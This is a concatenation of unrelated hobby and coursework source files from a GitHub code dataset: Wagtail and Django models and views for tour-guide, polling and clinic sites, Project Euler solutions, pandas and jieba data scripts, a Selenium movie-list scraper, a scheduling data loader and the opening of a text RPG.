FormField(AbstractFormField):\n page = ParentalKey(\n 'OurteamPage',\n on_delete=models.CASCADE,\n related_name='form_fields',\n )\n\nclass OurteamPage(AbstractEmailForm):\n \"\"\"our Team page\"\"\"\n\n template = \"ourteam/ourteam_page.html\"\n\n subtitle = models.CharField(max_length=100, null=True, blank=True)\n\n thank_you_text = RichTextField(blank=True)\n\n content = StreamField(\n [\n (\"title_and_text\", blocks.TitleAndTextBlock()),\n (\"full_richtext\", blocks.RichtextBlock()),\n (\"cards\", blocks.CardBlock()),\n ],\n null=True,\n blank=True\n\n )\n\n #def get_context(self, request):\n # #if request.POST:\n # context = super().get_context(request)\n # guide = request.GET.get('guide')\n # if guide is not None:\n\n _guide = None\n @property\n def guide_page(self):\n return self._guide\n\n @guide_page.setter\n def guide_page(self, current_guide):\n self._guide = current_guide\n\n @property\n def return_form(self):\n form = self.get_form()\n return form\n \n def get_form(self, *args, **kwargs):\n form = super().get_form(*args, **kwargs)\n # iterate through the fields in the generated form\n for name, field in form.fields.items(): \n # for all fields, get any existing CSS classes and add 'form-control'\n # ensure the 'class' attribute is a string of classes with spaces\n css_classes = field.widget.attrs.get('class', '').split()\n css_classes.append('form-control')\n field.widget.attrs.update({'class': ' '.join(css_classes)})\n return form\n\n #def render_landing_page(self, request, form_submission=None, *args, **kwargs):\n # page = request.POST.get(\"guide\")\n # url = self.url\n # return redirect(page, permanent=False) \n\n search_fields = Page.search_fields + [\n index.SearchField('subtitle'),\n # index.SearchField('body'),\n ]\n\n content_panels = AbstractEmailForm.content_panels + [\n InlinePanel('form_fields', label='Form Fields'),\n FieldPanel('thank_you_text'),\n MultiFieldPanel([\n FieldRowPanel([\n FieldPanel('from_address', classname=\"col6\"),\n FieldPanel('to_address', classname=\"col6\"),\n ]),\n FieldPanel(\"subject\"),\n ], heading=\"Email Settings\"),\n FieldPanel(\"subtitle\"),\n StreamFieldPanel(\"content\")\n ]\n\n class Meta:\n verbose_name = \"Our Team Page\"\n verbose_name_plural = \"Our Team Pages\"\n\nclass TourGuidePage(Page):\n template = \"ourteam/tourguide_page.html\"\n\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n intro = models.CharField(max_length=254, null=True, blank=True)\n body = RichTextField(blank=True)\n qualifications = ParentalManyToManyField(\"ourteam.GuideQualification\", blank=True)\n include_contact_form = models.BooleanField()\n contact_email = models.CharField(max_length=100)\n image = models.ForeignKey(\n \"wagtailimages.Image\",\n on_delete=models.SET_NULL,\n null=True,\n blank=False,\n related_name=\"+\",\n )\n\n allow_direct_guide_booking = models.BooleanField(help_text=\"wether this guide agrees to be booked for an hourly rate plus additional charge\")\n hourly_rate_low_season = models.DecimalField(max_digits=4, decimal_places=2,help_text=\"hourly rate low season\")\n hourly_rate_high_season = models.DecimalField(max_digits=4, decimal_places=2,help_text=\"hourly rate high season\")\n additional_charge_per_day = models.DecimalField(max_digits=4, decimal_places=2, help_text=\"added charge per group for each day\", default=20.00)\n #form = ContactForm()\n\n main_province = models.ForeignKey(\n 'tours.TourProvince',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n def get_context(self, request):\n context = super().get_context(request)\n parent = self.get_parent()\n parent.specific.guide_page = self\n form = parent.specific.return_form\n context['ourteamsform'] = form\n return context\n # context['parent'] = parent\n # return context\n @property\n def return_form(self):\n return self.get_parent().specific.return_form()\n\n def clean(self):\n \"\"\"Override the values of title and slug before saving.\"\"\"\n super(TourGuidePage, self).clean()\n self.title = \"%s %s\" % (self.first_name, self.last_name)\n self.slug = slugify(self.title) \n\n #def contact_us(self, request):\n # if request.method == 'POST':\n # form = ContactForm(request.POST)\n # if form.is_valid():\n # # send email code goes here\n # return HttpResponse('Thanks for contacting us!')\n # else:\n # form = ContactForm()\n\n # return render(request, 'contact-landing.html', {'form': form})\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n index.SearchField('body'),\n index.SearchField('qualifications'),\n index.SearchField('guide_tours'),\n ]\n\n #content_panels = Page.content_panels + [\n content_panels = [\n MultiFieldPanel([\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n FieldPanel('contact_email'),\n FieldPanel('include_contact_form'),\n ImageChooserPanel(\"image\"),\n SnippetChooserPanel(\"main_province\"),\n ], heading=\"Guide general information\"),\n MultiFieldPanel(\n [\n FieldPanel(\"qualifications\", widget=forms.CheckboxSelectMultiple)\n ],\n heading=\"Guide Qualifications\"\n ),\n MultiFieldPanel([\n InlinePanel(\"guide_tours\", label=\"Tours\", min_num=0, max_num=10), \n FieldPanel('allow_direct_guide_booking'),\n FieldPanel('hourly_rate_low_season'),\n FieldPanel('hourly_rate_high_season'),\n FieldPanel('additional_charge_per_day'),\n ], heading=\"Tours Specification\"),\n FieldPanel('intro'),\n FieldPanel('body'),\n ]\n\nTourGuidePage._meta.get_field('slug').default = 'blank-slug'","repo_name":"wolfpirker/wagtail-webproject","sub_path":"ourteam/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30200128344","text":"import os\n\n# Probleme 16 ___________________________________\n\ndef digitsum(n):\n N=2**n\n c=str(N)\n S=0\n for k in c:\n d=int(k)\n S+=d\n return S\n\nassert (digitsum(15))==26\n\nprint (digitsum(1000)) \n#=1366\n\n\n\n# Probleme 22 ______________________________________\n\ndef valeurlettre(lettre):\n L=['\"','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n k=0\n while lettre!=L[k]:\n k+=1\n return k \n print (k)\n \nassert (valeurlettre('K'))==11\n \n \n \n\ndef nscore():\n os.chdir(\"/Users/alixrenier/Documents/Mines/Info\")\n Names=open('names.txt','r') #'r' permet de lire le fichier, 'w' permet de le modifie\n Stot=0\n for k in Names:\n ch=k\n L=ch.split(',')\n #print(L)\n T=sorted(L) #Liste des noms triés par ordre alphabétique\n #print (T)\n for i in range(len(T)): \n position=i+1\n nom=str(T[i])\n Si=0\n for j in range(len(nom)):\n valeur=valeurlettre(nom[j])\n Si+=valeur\n Ai=Si*position\n Stot+=Ai\n return Stot\n \nprint(nscore())\n#=87119882\n \n \n \n# Probleme 55 _________________________________________\n\ndef revadd(n): #Renverse n et renvoie sa somme avec n \n N=str(n)\n L=str()\n for k in range(len(N)):\n L=L+N[len(N)-(k+1)]\n l=int(L)\n S=n+l\n return S\n \ndef estunlychrel (n) :\n S = n\n k = 0\n while k<50 and not palindrome(S) :\n S = revadd(S)\n k+=1\n if k < 50:\n return False\n else :\n return True\n \nassert (revadd(47))==121\n\n\ndef palindrome(S): #Détermine si S est un palindrome\n C=str(S)\n k=0\n for i in range(int(len(C)/2)):\n if C[i]==C[len(C)-(i+1)]:\n k+=1\n return k==int(len(C)/2)\n\nassert (palindrome(121))==True\n \n \ndef estunlychrel (n) :\n S = revadd(n)\n k = 0\n while k<50 and not palindrome(S) :\n S = revadd(S)\n k+=1\n if k < 50:\n return False\n else :\n return True\n \ndef solve(n) :\n N = 0\n for i in range(n) :\n if estunlychrel(i) :\n N+=1\n return N\n\n#print (solve(10000))\n#=249\n \n \n \n \n\n \n \n \n \n \n \n","repo_name":"mines-nancy-tcss1a-2018/td1-AlixRenier","sub_path":"TD1.py","file_name":"TD1.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5080155145","text":"import pandas as pd\nimport glob\nimport os\n\ninput_file = 'C:/data/csv/predict1/'\n\noutput_file = 'C:/data/csv/predict1/result4.csv'\n\nallFile_list = glob.glob(os.path.join(input_file, '0121predict3_*'))\n\nprint(allFile_list)\nallData = []\n\nfor file in allFile_list:\n df = pd.read_csv(file) # for구문으로 csv파일들을 읽어 들인다\n df = df.iloc[:,-1]\n allData.append(df) # 빈 리스트에 읽어 들인 내용을 추가한다\n\ndataCombine = pd.concat(allData, axis=1, ignore_index=True)\n\ndataCombine.to_csv(output_file, index=False,header=0)","repo_name":"jsja22/study","sub_path":".vscode/solar_system/solar_0120_csv.py","file_name":"solar_0120_csv.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73146105766","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms import modelformset_factory\nfrom .models import Question, Choice\nfrom .forms import QuestionForm, ChoiceForm\n\ndef index(request):\n\n if request.method == \"POST\":\n question = get_object_or_404(Question, pk=request.POST[\"question\"])\n question.delete()\n return HttpResponseRedirect(reverse(\"main:index\"))\n\n latest_question_list = Question.objects.filter(pub_date__lte=timezone.now()).exclude(choice__isnull=True).order_by(\"pub_date\")\n context = { \"latest_question_list\": latest_question_list }\n return render(request, \"main/index.html\", context)\n\n@login_required\ndef detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, \"main/detail.html\", {\"question\": question})\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, \"main/results.html\", {\"question\": question})\n\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST[\"choice\"])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(\n request,\n \"main/detail.html\",\n {\n \"question\": question,\n \"error_message\": \"You didn't select a choice.\",\n },\n )\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse(\"main:results\", args=(question.id,)))\n \ndef sign_up(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return HttpResponseRedirect(reverse(\"main:index\"))\n else:\n form = UserCreationForm()\n \n return render(request, \"registration/sign_up.html\", {\"form\": form})\n\n@login_required\ndef create_question(request):\n if request.method == \"POST\":\n form_q = QuestionForm(request.POST)\n ChoiceFormSet = modelformset_factory(Choice, fields=['choice_text'], form=ChoiceForm, extra=4)\n choice_formset = ChoiceFormSet(request.POST, queryset=Choice.objects.none())\n\n if form_q.is_valid() and choice_formset.is_valid():\n question = form_q.save(commit=False)\n question.pub_date = timezone.now()\n question.save()\n \n for choice_form in choice_formset:\n choice = choice_form.save(commit=False)\n if choice.choice_text == \"\":\n continue\n choice.question = question\n choice.votes = 0\n choice.save()\n \n return HttpResponseRedirect(reverse(\"main:index\"))\n else:\n form_q = QuestionForm()\n ChoiceFormSet = modelformset_factory(Choice, fields=['choice_text'], form=ChoiceForm, extra=4)\n choice_formset = ChoiceFormSet(queryset=Choice.objects.none())\n return render(request, \"main/create_question.html\", {\"form_q\": form_q, \"choice_formset\": choice_formset})","repo_name":"VolodymyrHarasymchuk/django-project","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22449006234","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('data-master/airports', views.airports, name=\"airports\"),\n path('data-master/carriers', views.carriers, name=\"carriers\"),\n path('dataset-raw', views.dataset_raw, name=\"dataset-raw\"),\n path('dataset-clean', views.dataset_clean, name=\"dataset-clean\"),\n path('json_statistik', views.json_statistik, name=\"json_statistik\"),\n path('statistik', views.statistik, name=\"statistik\"),\n path('classifier', views.classifier, name=\"classifier\"),\n path('prediction', views.prediction, name=\"prediction\"),\n path('json_dataset_clean', views.json_dataset_clean, name=\"json_dataset_clean\"),\n path('json_predict', views.json_predict, name=\"json_predict\"),\n path('json_split_data', views.json_split_data, name=\"json_split_data\"),\n]\n","repo_name":"KurangKering/sdfsfslvjx","sub_path":"app/system/flightdelay/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17250930935","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm, UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom .models import(\n Medico,\n Especialidade,\n Paciente,\n Consulta\n)\nfrom .forms import (\n MedicoForm,\n EspecialidadeForm,\n PacienteForm,\n ConsultaForm,\n\tEditarPerfilForm,\n\tCadastraUsuarioForm\n)\n# Create your views here.\n@login_required()\ndef listaConsultas(request):\n consultas = Consulta.objects.all()\n form = ConsultaForm()\n data = {'consultas':consultas , 'form':form}\n return render(request, 'sistema/consultas/lista-consultas.html', data)\n\n@login_required()\ndef cadastraConsulta(request):\n form = ConsultaForm(request.POST or None)\n data = {'form':form}\n if form.is_valid():\n form.save()\n return redirect('lista_consultas')\n return render(request,'sistema/consultas/cadastraconsulta.html',data)\n\n\n@login_required()\ndef editaConsulta(request, id):\n\tdata = {}\n\tconsulta = Consulta.objects.get(id=id) #pega a pessoa que vai se editada\n\tform = ConsultaForm(request.POST or None, instance = consulta) # inicia um formulario com os campos preenchidos\n\tdata['consulta'] = consulta\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_consultas')\n\telse:\n\t\treturn render(request, 'sistema/consultas/editaconsulta.html', data)\n\n\n@login_required()\ndef deleteConsulta(request, id):\n\tconsulta = Consulta.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tconsulta.delete()\n\t\treturn redirect('lista_consultas')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n {'obj': consulta, 'url': \"/consultas/\"})\n\n\n#medicos\n@login_required()\ndef listaMedicos(request):\n medicos = Medico.objects.all()\n form = MedicoForm()\n data = {'medicos':medicos , 'form':form}\n return render(request, 'sistema/medicos/lista-medicos.html', data)\n\n\n@login_required()\ndef cadastraMedico(request):\n form = MedicoForm(request.POST or None)\n data = {'form':form}\n if form.is_valid():\n form.save()\n return redirect('lista_medicos')\n return render(request,'sistema/medicos/cadastramedico.html',data)\n\n\n@login_required()\ndef editaMedico(request, id):\n\tdata = {}\n\tmedico = Medico.objects.get(id=id) #pega a pessoa que vai se editada\n\tform = MedicoForm(request.POST or None, instance = medico) # inicia um formulario com os campos preenchidos\n\tdata['medico'] = medico\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_medicos')\n\telse:\n\t\treturn render(request, 'sistema/medicos/editamedico.html', data)\n\n\n@login_required()\ndef deleteMedico(request, id):\n\tmedico = Medico.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tmedico.delete()\n\t\treturn redirect('lista_medicos')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n {'obj': medico, 'url': \"/medicos/\"})\n\n\n@login_required()\ndef listaEspecialidades(request):\n especialidades = Especialidade.objects.all()\n form = EspecialidadeForm()\n data = {'especialidades':especialidades , 'form':form}\n return render(request, \n 'sistema/especialidade/lista-especialidades.html', data)\n\n\n@login_required()\ndef cadastraEspecialidade(request):\n\tform = EspecialidadeForm(request.POST or None)\n\tdata = {'form':form}\n\tif form.is_valid():\n\t\tform.save()\n\t\treturn redirect('lista_especialidades')\n\n\n@login_required()\ndef editaEspecialidade(request, id):\n\tif not request.user.has_perm('usuario.view_user'):\n\t\treturn redirect('sem_permissao')\n\tdata = {}\n\tespecialidade = Especialidade.objects.get(id=id) #pega a pessoa que vai se editada\n\tform = EspecialidadeForm(request.POST or None, instance = especialidade) # inicia um formulario com os campos preenchidos\n\tdata['especialidade'] = especialidade\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_especialidades')\n\telse:\n\t\treturn render(request, 'sistema/especialidade/editaespecialidade.html', data)\n\n\n@login_required()\ndef deleteEspecialidade(request, id):\n\tespecialidade = Especialidade.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tespecialidade.delete()\n\t\treturn redirect('lista_especialidades')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n {'obj': especialidade, 'url': \"/especialidades/\"})\n\n\n@login_required()\ndef listaPacientes(request):\n pacientes = Paciente.objects.all()\n form = PacienteForm()\n data = {'pacientes':pacientes , 'form':form}\n return render(request, \n 'sistema/pacientes/lista-pacientes.html', data)\n\n\n@login_required()\ndef cadastraPaciente(request):\n form = PacienteForm(request.POST or None)\n data = {'form':form}\n if form.is_valid():\n form.save()\n return redirect('lista_pacientes')\n return render(request,'sistema/pacientes/cadastrapaciente.html',data)\n\n\n\n@login_required()\ndef editaPaciente(request, id):\n\tdata = {}\n\tpaciente = Paciente.objects.get(id=id) #pega a pessoa que vai se editada\n\tform = PacienteForm(request.POST or None, instance = paciente) # inicia um formulario com os campos preenchidos\n\tdata['paciente'] = paciente\n\tdata['form'] = form\n\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_pacientes')\n\telse:\n\t\treturn render(request, 'sistema/pacientes/editapaciente.html', data)\n\n\n@login_required()\ndef deletePaciente(request, id):\n\tpaciente = Paciente.objects.get(id=id)\n\tif request.method == 'POST':\n\t\tpaciente.delete()\n\t\treturn redirect('lista_pacientes')\n\telse:\n\t\treturn render(request, 'sistema/deleteconfirm.html', \n {'obj': paciente, 'url': \"/pacientes/\"})\n\n\n#MEU PERFIL\n@login_required()\ndef listaPerfil(request):\n\targs = {'user': request.user}\n\treturn render(request, 'sistema/perfil/perfil.html', args)\n\n\n\n@login_required()\ndef editaPerfil(request):\n\tif request.method == 'POST':\n\t\tform = EditarPerfilForm(request.POST, instance=request.user)\n\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('lista_perfil')\n\t\n\telse:\n\t\tform = EditarPerfilForm(instance=request.user)\n\t\targs = {'form': form}\n\t\treturn render(request, 'sistema/perfil/editaperfil.html', args)\n\n\n#cadastra usuario\n@login_required()\ndef cadastraUsuario(request):\n\tif not request.user.has_perm('usuario.view_user'):\n\t\treturn redirect('sem_permissao')\n\tif request.method == 'POST':\n\t\tform = CadastraUsuarioForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('cadastra_usuario_sucesso')\n\telse:\n\t\tform = CadastraUsuarioForm()\n\t\targs = {'form':form}\n\t\treturn render(request, 'sistema/usuarios/cadastrausuario.html', args)\n\n\n@login_required()\ndef cadastraUsuarioSucesso(request):\n\treturn render(request, 'sistema/usuarios/cadastro-usuario-sucesso.html')\n\n\n@login_required()\ndef semPermissao(request):\n\treturn render(request, 'sistema/sem-permissao.html')\n","repo_name":"renanosoriorosa/pyHospital","sub_path":"clinica/sistema/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22026504077","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nfrom selenium import webdriver as wd\n\ndriver = webdriver.Chrome(executable_path=\"chromedriver.exe\")\n\ndriver.implicitly_wait(10)\n\ndriver.get('https://pedia.watcha.com/ko-KR/decks/OphYTWVoSDLG')\n\nresponse = requests.get('https://pedia.watcha.com/ko-KR/decks/OphYTWVoSDLG')\nsoup = BeautifulSoup(response.text, 'html.parser')\nmovies_list = soup.select('ul.css-xv4sal-VisualUl-ContentGrid-DeckContentGrid.e12idbfv16 > li')\nprint(movies_list)\n\nfinal_movie_data = []\n\nfor movie in movies_list:\n a_tag = movie.select_one('a')\n\n movie_title = a_tag['title']\n movie_code = a_tag['href'].split('contents/')[1]\n\n movie_data = {\n 'title': movie_title,\n 'code': movie_code,\n }\n final_movie_data.append(movie_data)\n\n print(final_movie_data)\n\nSCROLL_PAUSE_TIME = 10\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n# 화면 최하단으로 스크롤 다운\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # 페이지 로드를 기다림\n time.sleep(SCROLL_PAUSE_TIME)\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight-50);\")\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n # 새로운 높이가 이전 높이와 변하지 않았을 경우 스크롤 종료\n if new_height == last_height:\n break\n\n # 스크롤 다운이 된다면 스크롤 다운이 된 후의 창 높이를 새로운 높이로 갱신\n last_height = new_height\n\n\n\n\n\n\n# with open('./brand_infos.csv', mode='w') as brand_infos:\n# brand_writer = csv.writer(brand_infos)\n\n# for list in brand_list:\n# brand_writer.writerow([list[\"name\"], list[\"img\"], list[\"link\"]])\n\n\n# for movie in final_movie_data:\n# movie_code = movie['code']\n\n# # 영화 리뷰의 경우 headers 체크를 따로 하지 않아서 굳이 보낼 필요 없음\n# params = (\n# ('code', movie_code),\n# ('type', 'after'),\n# ('isActualPointWriteExecute', 'false'),\n# ('isMileageSubscriptionAlready', 'false'),\n# ('isMileageSubscriptionReject', 'false'),\n# )\n\n# response = requests.get(\n# 'https://movie.naver.com/movie/bi/mi/pointWriteFormList.nhn', params=params)\n\n# soup = BeautifulSoup(response.text, 'html.parser')\n\n# review_list = soup.select('body > div > div > div.score_result > ul > li')\n\n# count = 0\n\n# for review in review_list:\n# score = review.select_one('div.star_score > em').text\n# reple = ''\n\n# # 일반적인 경우 먼저 처리 (일반적인 것을 먼저 처리하는 것이 효율적이다)\n# if review.select_one(f'di\u001Fv.score_reple > p > span#_filtered_ment_{count} > span#_unfold_ment{count}') is None:\n# reple = review.select_one(\n# f'div.score_reple > p > span#_filtered_ment_{count}').text.strip()\n# # 리뷰가 긴 경우 처리\n# elif review.select_one(f'div.score_reple > p > span#_filtered_ment_{count} > span#_unfold_ment{count}'):\n# reple = review.select_one(\n# f'div.score_reple > p > span#_filtered_ment_{count} > span > a')['data-src']\n\n# print(score, reple)\n\n# count += 1\n","repo_name":"5ohyun/Scraping","sub_path":"incomplete_selenium.py","file_name":"incomplete_selenium.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16463799368","text":"import jieba.analyse\n\nfile_name = 'D:\\桌面文件\\研究生\\研一课程\\大数据分析\\课程论文\\weibo_clean.txt'\ntopK =200\ncontent = open(file_name, 'rb').read()\n\njieba.analyse.set_stop_words('D:\\桌面文件\\研究生\\研一课程\\大数据分析\\课程论文\\stopwords.txt')\n\nprint('tf-idf : ')\nfor x, w in jieba.analyse.extract_tags(content, withWeight=True, topK=topK):\n print(x)\nfor x, w in jieba.analyse.extract_tags(content, withWeight=True, topK=topK):\n print(w)\n # print('%s %s' % (x, w))\n\n# print('TextRank : ')\n# for x, w in jieba.analyse.textrank(content, withWeight=True, topK=topK):\n# print('%s %s' % (x, w))\n","repo_name":"wuhuairline/public-data-analysis","sub_path":"tf-idf-jieba.py","file_name":"tf-idf-jieba.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28189641091","text":"import pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\n\n# Load and preprocess data from file\ndef load_data(file):\n df = pd.read_csv(file)\n if (\"Unnamed: 10\" in df.columns): df = df.drop(\"Unnamed: 10\", axis =1)\n # Convert to Categorical\n sex_map = {\"M\": 0, \"F\": 1}\n mstatus_map = {\"single\":0, \"married\":1, \"widowed\":2, \"divorced\":3}\n occupation_map = {'legal':0, 'IT':1, 'government':2, 'manuf':3, 'retired':4, \n 'finance':5,'construct':6, 'education':7, 'medicine':8}\n education_map = {'postgrad':3, 'secondary':0, 'tertiary':1, 'professional':2}\n df[\"sex\"] = df[\"sex\"].map(sex_map)\n df[\"mstatus\"] = df[\"mstatus\"].map(mstatus_map)\n df[\"occupation\"] = df[\"occupation\"].map(occupation_map)\n df[\"education\"] = df[\"education\"].map(education_map) \n return df\n\n# Expected profit for given customer\ndef expected_profit_customer(cip, product):\n adj_cip = 0\n if product == 'A':\n adj_cip = cip * 0.6\n if product == 'B':\n adj_cip = cip\n return adj_cip\n\n# Compute expected profit for customers selected for campaign\ndef expected_profit_campaign_predicted(model, expert, df, save_csv=False): \n cust_predict = []\n product_predict = model.predict(df)\n for index in tqdm(range(len(df))): \n row = df.loc[index]\n cip = expert.predict(row)\n product = product_predict[index]\n expected_profit = expected_profit_customer(cip, product)\n cust_predict.append([df.loc[index, \"index\"], product, cip, expected_profit]) \n \n cust_predict_df = pd.DataFrame(cust_predict, columns=[\"index\", \"product\", \"cip\", \"expected profit\"])\n cust_predict_df_sorted = cust_predict_df.sort_values(by=[\"expected profit\"], ascending=False)\n cust_campaign_400 = cust_predict_df_sorted[:400]\n \n if save_csv:\n cust_predict_df.to_csv(\"data/Cust_Predict.csv\", index=False)\n cust_campaign_400.to_csv(\"data/Cust_Predict_400.csv\", index=False)\n\n expected_profit_campaign = np.sum(cust_campaign_400[\"expected profit\"].values)\n\n return expected_profit_campaign, cust_campaign_400[\"index\"].values\n\n# Compute actual profit for customers selected for campaign\ndef expected_profit_campaign_actual(df):\n profit = []\n for index in range(len(df)):\n profit.append(expected_profit_customer(df.loc[index, \"cust Investment Potential Score\"], \n df.loc[index, \"status\"]))\n \n df[\"profit\"] = profit\n df_sorted = df.sort_values(by=[\"profit\"], ascending=False)\n df_sorted_400 = df_sorted[:400]\n expected_profit = np.sum(df_sorted_400[\"profit\"].values)\n \n return expected_profit, df_sorted_400[\"index\"].values\n\n# Compute actual profit corresponding to predicted indexes\ndef expected_profit_campaign_predicted_actual(df, indexs):\n profit = []\n for index in indexs:\n profit.append(expected_profit_customer(df.loc[index, \"cust Investment Potential Score\"], \n df.loc[index, \"status\"]))\n \n expected_profit = np.sum(profit)\n\n return expected_profit\n\n# Return the number of matches between actual and predicted\ndef matches_count(actual, predicted):\n matches = set(actual) & set(predicted)\n return len(matches)","repo_name":"sidd-pandey/Fuzzy-GA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73012994085","text":"import setuptools\n\nimport multicomma\n\nwith open(\"README.md\", \"r\") as readme:\n\tlong_description = readme.read()\n\nsetuptools.setup(\n\tname=\"MultiComma\",\n\tversion=multicomma.__version__,\n\turl=\"https://github.com/darricktheprogrammer/multicomma\",\n\n\tauthor=\"Darrick Herwehe\",\n\tauthor_email=\"darrick@exitcodeone.com\",\n\n\tdescription=\"Placeholder text for short description\",\n\tlong_description=long_description,\n\tlicense=\"MIT\",\n\n\tpackages=setuptools.find_packages(),\n\n\tinstall_requires=[],\n\n\tclassifiers=[\n\t\t\"Development Status :: 2 - Pre-Alpha\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t],\n)\n","repo_name":"darricktheprogrammer/MultiComma","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70924526565","text":"from Job import JOB\nimport pandas\n\n# weight = [0.2,0.2,0.5,0.1]\ndef ReadData(path, J ):\n Read = open(path + \".csv\", 'r')\n R2 = open(path + '_Mj.csv')\n df = pandas.read_csv(path + \".csv\")\n des = df.describe()\n\n Read.readline()\n i = 0\n for line in Read.readlines():\n line = line.strip().split(',')\n j = JOB()\n j.index = i\n i += 1\n j.processing_time = int(line[0])\n j.release_date = int(line[1])\n j.pieces = int(line[2])\n j.weight = int(line[3])\n j.Temperature = int(line[4])\n j.due_date = int(float(line[5]))\n j.WP = j.pieces * j.weight / j.processing_time\n\n j.processing_time_n = (j.processing_time - des['p'][\"min\"]) / (des['p'][\"max\"] - des['p'][\"min\"])\n j.pieces_n = (j.pieces - des['w'][\"min\"]) / (des['w'][\"max\"] - des['w'][\"min\"])\n j.weight_n = (j.weight - des['v'][\"min\"]) / (des['v'][\"max\"] - des['v'][\"min\"])\n j.due_date_n = (j.due_date - des['d'][\"min\"]) / (des['d'][\"max\"] - des['d'][\"min\"])\n j.release_date_n = (j.release_date - des['r'][\"min\"]) / (des['r'][\"max\"] - des['r'][\"min\"])\n\n\n\n J.append(j)\n # print(path)\n index = 0\n for line in R2.readlines():\n line = line.strip().split(',')\n for item in line:\n if item != '':\n J[index].Mj.append(int(item))\n\n index += 1\n","repo_name":"AsheeHuang/Multi_objective_scheduling","sub_path":"ReadData.py","file_name":"ReadData.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18867206591","text":"from sys import exit\nimport os\nfrom halfling import Halfling\nimport events\nimport hud\n\n\ndef start():\n title()\n print(\"1. Start\\n2. Quit\")\n choice = input(\"> \")\n if choice == \"1\":\n return True\n if choice == \"2\":\n return False\n print(\"Invalid input.\")\n return start()\n\n\ndef title():\n line_length = 60\n game_name = '\" P O T A T O \"'\n game_desc = \"A pen and paper RPG by Oliver Darkshire\"\n game_desc2 = \"Coded by Cody Mills\"\n plot = 